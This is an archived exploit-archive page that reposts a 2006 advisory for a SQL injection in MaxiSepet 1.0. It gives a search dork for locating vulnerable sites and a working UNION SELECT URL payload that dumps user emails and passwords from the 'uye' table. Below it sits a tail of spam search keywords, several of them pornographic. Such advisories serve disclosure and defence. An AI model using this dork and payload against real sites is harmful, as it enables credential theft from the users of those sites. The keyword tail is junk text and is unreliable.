about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MaxiSepet <= 1.0 (link) SQL Injection Vulnerability



2006-06-11 MaxiSepet <= 1.0 (link) SQL Injection Vulnerability
Rated as : High Risk

#Method found by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=42
#Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability.

#Dork: "Copyright MaxiSepet �"

#How: Parameter link did not sanitized properly.

#Example: GET ->
http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL

#Example: GET ->
http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('�ye%20adi:%20<b>',email,'</b><br>','�ifre:%20<b>',sifre,'</b>')+from+uye+ORDER
BY email ASC

# nukedx.com [2006-06-11]
securitydot.net - 2006-06-11

Advertising

Copyright 2007, SecurityDot
Mon, 30 Nov 2009 17:06:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
mambo Remo 277127665. TAMIL.SEX. www.sf.my PwerPoint Stack-base priyamanis www.sf.my wwww.takta kelly key Kareena ka linux 2.6. www.zhuany www.xxnx.c windows me www.xgcp8. Pornsex 200 /compo raw_sendms 39suncity. Wap+sex bbs.wxds5. www.animat jenna jame C.AT.INIST news for C sex vidios www.Adults www sex 89 global ann Serv-U+FTP shv4 www.dldvb. impex%252F 88BY88 wwwanemals Vulnerabil www.jshuwe pron image news for c axis commu www.Adults 200 /compo SEX GIRLS PHPJunkYar www.Hotsex free xxl sexy lady www.955gg. www89.com.